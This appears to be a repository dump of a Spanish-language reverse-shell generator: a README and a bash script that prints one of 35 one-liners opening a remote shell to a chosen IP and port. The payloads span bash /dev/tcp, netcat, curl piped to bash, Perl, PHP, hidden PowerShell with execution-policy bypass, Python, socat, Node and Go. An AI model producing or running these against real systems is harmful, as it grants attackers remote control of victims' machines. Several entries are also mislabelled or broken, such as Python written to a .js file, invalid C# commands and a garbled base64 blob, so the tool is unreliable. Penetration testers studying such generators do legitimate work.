├── README.md └── revshell.sh /README.md: -------------------------------------------------------------------------------- 1 | # Generador Automatico de Shell Inversa 2 | 3 | Una shell inversa se refiere a un proceso en el que la máquina de la víctima se conecta a la del atacante para recibir comandos. Es una técnica eficiente, ya que evade los firewalls y filtros de seguridad del tráfico que ingresa al ordenador. Por eso, los atacantes suelen utilizar este tipo de shells y es recomendable también hacerlo en tests de intrusión. 4 | 5 | GIF 6 | 7 | ## Instalación 8 | 9 | Clonamos el repositorio 10 | 11 | ```bash 12 | git clone https://github.com/Yextep/Auto-Reverse-Shell-Generator 13 | ``` 14 | Accedemos a la carpeta 15 | ```bash 16 | cd Auto-Reverse-Shell-Generator 17 | ``` 18 | Ejecutamos 19 | ```bash 20 | bash revshell.sh 21 | ``` 22 | 23 | # Por último seleccionas el tipo de reverse shell que quieras generar, escribes la IP, el Puerto y el Script te genera la shell. 24 | GIF 25 | -------------------------------------------------------------------------------- /revshell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Función para imprimir las opciones de Reverse Shell disponibles 4 | function opciones { 5 | echo "Opciones de Reverse Shell disponibles:" 6 | echo "1. Bash" 7 | echo "2. Netcat" 8 | echo "3. nc mkfifo" 9 | echo "4. nc -e" 10 | echo "5. nc.exe -e" 11 | echo "6. ncat -e" 12 | echo "7. curl" 13 | echo "8. rustcat" 14 | echo "9. c" 15 | echo "10. c windows" 16 | echo "11. c# tcp client" 17 | echo "12. c# bash -i" 18 | echo "13. perl" 19 | echo "14. php" 20 | echo "15. php cmd" 21 | echo "16. php system" 22 | echo "17. windows conpty" 23 | echo "18. Powershell" 24 | echo "19. Powershell (TLS)" 25 | echo "20. Powershell (base64)" 26 | echo "21. Python" 27 | echo "22. Ruby" 28 | echo "23. socat" 29 | echo "24. socat (TTY)" 30 | echo "25. Crystal" 31 | echo "26. sqlite3 nc mkfifo" 32 | echo "27. node.js" 33 | echo "28. Java" 34 | echo "29. Java Web" 35 | echo "30. Javascript" 36 | echo "31. Groovy" 37 | echo "32. Telnet" 38 | echo "33. Zsh" 39 | echo "34. Lua" 40 | echo "35. Golang" 41 | } 42 | 43 | # Imprimir las opciones de Reverse Shell disponibles 44 | opciones 45 | 46 | # Leer la opción seleccionada por el usuario 47 | read -p "Seleccione el número de la opción de Reverse Shell que desea generar: " opcion 48 | 49 | # Leer la dirección IP 50 | read -p "Ingrese la dirección IP: " ip 51 | 52 | # Leer el puerto 53 | read -p "Ingrese el puerto: " puerto 54 | 55 | # Generar el comando de Reverse Shell correspondiente 56 | case $opcion in 57 | 1) echo "bash -i >& /dev/tcp/$ip/$puerto 0>&1";; 58 | 2) echo "nc -e /bin/sh $ip $puerto";; 59 | 3) echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $puerto >/tmp/f";; 60 | 4) echo "nc $ip $puerto -e /bin/sh";; 61 | 5) echo "nc.exe -e cmd.exe $ip $puerto";; 62 | 6) echo "ncat $ip $puerto -e /bin/sh";; 63 | 7) echo "curl $ip:$puerto | /bin/bash";; 64 | 8) echo "rustcat $ip $puerto --exec /bin/sh";; 65 | 9) echo "rm -f /tmp/p; mknod /tmp/p p && nc $ip $puerto 0/tmp/p";; 66 | 10) echo "nc.exe -e cmd.exe $ip $puerto";; 67 | 11) echo "csharp -e cmd=System.Net.Sockets.TcpClient(\"$ip\",$puerto);";; 68 | 12) echo "csharp -e cmd=System.Diagnostics.Process.Start(\"/bin/bash\",\"-c\",\"$ip $puerto\");";; 69 | 13) echo "perl -e 'use Socket;$i=\"$ip\";$p=$puerto;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'";; 70 | 14) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);exec(\"/bin/sh -i <&3 >&3 2>&3\");'";; 71 | 15) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);shell_exec(\"/bin/bash -i <&3 >&3 2>&3\");'";; 72 | 16) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);system(\"/bin/bash -i <&3 >&3 2>&3\");'";; 73 | 17) echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'";; 74 | 18) echo "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto);\$stream=(New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto)).GetStream()));[byte[]]\$bytes=0..65535|%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length)) -ne 0){;\$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte=[text.encoding]::ASCII.GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};";; 75 | 19) echo "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto);\$stream=(New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto)).GetStream()));[byte[]]\$bytes=0..65535|%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length)) -ne 0){;\$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte=[text.encoding]::ASCII.GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};";; 76 | 20) echo "powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand JABzAD0AcgBvAGwAdQBlAH0AJgBzACgAJABpAD0AXAB7ACQAbgBhAG0AZQAgAD0ATgBlAHQALgBXAGUAYgBjAGUALQBPAGIAagBlAGMAdAAgAFMAdAByAGUAYQBtACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQwBvAG4AdABlAG4AdAAoACkALAAkAHAAcgBvAHAAKQApADsAJABzdHJlYW0APQBoAHQAdABwADsAdwBpAG4AZABhAHQAIABzAG8AdQBsAGwAKABOAGUAdAAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAG4AdgBhAGwAdAAoACkALgBHAGUAdABTAHQAcgBhAG0ALgBUAGUAYQBwAGUAKABOAGUAdAAtAE8AYgBqAGUAYwB0ACkALgBHAGUAdABTAHQAcgBhAG0ALgBUAGUAYQBwAGUAKAApACkAOwBbAGIAeQB0AGUAcgBdAFsAdABlAHgAdAAuAGUAbgB0AGkAZQBuAHQAKABJAH4AdwBzAC4AVABlAGcAdQBsAGwALgBBU0NJAA==";; 77 | 21) echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$puerto));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";; 78 | 22) echo "ruby -rsocket -e'f=TCPSocket.open(\"$ip\",$puerto).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'";; 79 | 23) echo "socat tcp-connect:$ip $puerto exec:/bin/sh,pty,stderr,setsid,sigint,sane";; 80 | 24) echo "socat file:`tty`,raw,echo=0 tcp-connect:$ip $puerto";; 81 | 25) echo "crystal tcp.cr $ip $puerto";; 82 | 26) echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $puerto >/tmp/f";; 83 | 27) echo "nodejs -e 'const net = require(\"net\"), cp = require(\"child_process\"), sh = cp.spawn(\"/bin/sh\", []);const client = new net.Socket();client.connect($puerto, \"$ip\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;";; 84 | 28) echo "r = Runtime.getRuntime();p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/$ip/$puerto;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]);p.waitFor();";; 85 | 29) echo "msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$puerto -f raw > shell.jsp";; 86 | 30) echo "echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$puerto));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.js && node shell.js";; 87 | 31) echo "echo 'String host=\"$ip\";int port=$puerto;String cmd=\"/bin/bash\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};s.close();p.destroy();' > shell.groovy && groovy shell.groovy";; 88 | 32) echo "telnet $ip $puerto | /bin/bash | telnet $ip $puerto";; 89 | 33) echo "zsh -c 'zmodload zsh/net/tcp && ztcp $ip $puerto && zsh >&\$REPLY 2>&\$REPLY 0>&\$REPLY'";; 90 | 34) echo "lua -e 'require(\"socket\");require(\"os\");t=socket.tcp();t:connect(\"$ip\",\"$puerto\");os.execute(\"/bin/sh -i <&3 >&3 2>&3\");'";; 91 | 35) echo "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"$ip:$puerto\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}' > shell.go && go run shell.go";; 92 | *) echo "Opción no válida";; 93 | esac 94 | --------------------------------------------------------------------------------